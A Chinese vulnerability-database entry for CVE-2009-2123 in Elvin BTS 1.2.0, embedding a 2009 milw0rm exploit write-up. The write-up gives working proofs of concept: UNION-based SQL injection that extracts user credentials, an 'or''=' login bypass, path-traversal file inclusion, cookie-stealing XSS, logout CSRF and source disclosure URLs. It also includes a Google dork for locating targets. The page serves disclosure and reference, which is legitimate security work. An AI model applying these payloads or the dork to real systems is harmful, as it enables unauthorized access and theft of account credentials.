Elvinbts Elvin多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117969 漏洞类型 SQL注入
发布时间 2009-06-15 更新时间 2009-06-22
CVE编号 CVE-2009-2123 CNNVD-ID CNNVD-200906-319
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8953
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-319
|漏洞详情
Elvin1.2.0版本中存在多个SQL注入漏洞。远程攻击者可以借助(1)inUser(又称用户名)和(2)对(a)可从login.php中获得的inc/login.e的inPass(又称密码)参数以及(3)对(b)show_bug.php和(c)show_activity.php的id参数,执行任意SQL指令。
|漏洞EXP
#################################################################################################################
[+] Elvin BTS 1.2.0 Multiple Remote VUlnerabilities
[+] Discovered By SirGod 
[+] www.mortal-team.org
#################################################################################################################

- Script Homepage : http://www.elvinbts.org/
- Google Dork : Powered by Elvin Bug Tracking Server.

Elvin BTS suffers from a lot of vunerabilities

1) SQL Injection
2) Local File Inclusion
3) SQL Injection Login Bypass
4) Cross-Site Scripting
5) Cross-Site Request Forgery
6) Source Code Disclosure


----------------------- 1) SQL Injection ----------------------- 

- Vulnerable code is everywhere.I will present only 2 PoC's.

 a) Vulnerable code in show_bug.php

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$query_bug = sprintf("SELECT * FROM " .$prefix_db. "_bug WHERE bg_id_pk=" .$_GET['id']. " AND bg_deleted_dt IS NULL");
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC 

     http://127.0.0.1/[path]/show_bug.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+eb_profile--

  b) Vulnerable code in show_activity.php

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$query_activity = sprintf("SELECT * FROM " .$prefix_db. "_activity WHERE ay_bugid_fk=" .$_GET['id']. "");
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC 

     http://127.0.0.1/[path]/show_activity.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8+from+eb_profile--


----------------------- 2) Local File Inclusion ----------------------- 

- Vulnerable code in page.php


----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$filename = "pages/".$_GET['id'];
................................................
if(file_exists($filename)){
include($filename);
} else {
echo "<h2>Sorry page cannot be found!</h2>";
}
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC 

       http://127.0.0.1/[path]/page.php?id=../../../../../../BOOTSECT.BAK



----------------------- 3) SQL Injection Login Bypass----------------------- 

- Code in login.php ( in login.php is included the vulnerable code)

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
include(LoadElvinModule('login.ei'));
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


- Vulnerable code in inc/login.ei

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$query_login = sprintf("SELECT * FROM " .$prefix_db. "_profile WHERE ac_user_vc='" .$_POST['inUser']. "' AND ac_pass_vc='" .$_POST['inPass']. "'");
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC 

Login as :
  
 Username : 'or''='
 Password : 'or''='


----------------------- 4) Cross-Site Scripting----------------------- 

It's more XSS's in the script,but tired to find them all.

- Vulnerable code in show_activity.php

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<p>Back to bug # <a href="show_bug.php?id=<?php echo $_GET['id']; ?>"><?php echo $_GET['id']; ?></a></a></p>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC

    http://127.0.0.1/[path]/show_activity.php?id=<script>alert(document.cookie)</script>



----------------------- 5) Cross-Site Request Forgery----------------------- 

Logout CSRF

 - PoC

   http://127.0.0.1/[path]/login.php?logout



----------------------- 6) Source Code Disclosure----------------------- 

Go to /inc/ directory.You will se .ei files with php code inside.
That files are included and used by the script.

 - PoC's

    http://127.0.0.1/[path]/inc/login.ei
    http://127.0.0.1/[path]/inc/jump_bug.ei
    http://127.0.0.1/[path]/inc/create_account.ei

Etc..

############################################### EOF ##################################################

# milw0rm.com [2009-06-15]
|参考资料

来源:MILW0RM
名称:9342
链接:http://www.milw0rm.com/exploits/9342
来源:MILW0RM
名称:8953
链接:http://www.milw0rm.com/exploits/8953
来源:SECUNIA
名称:35486
链接:http://secunia.com/advisories/35486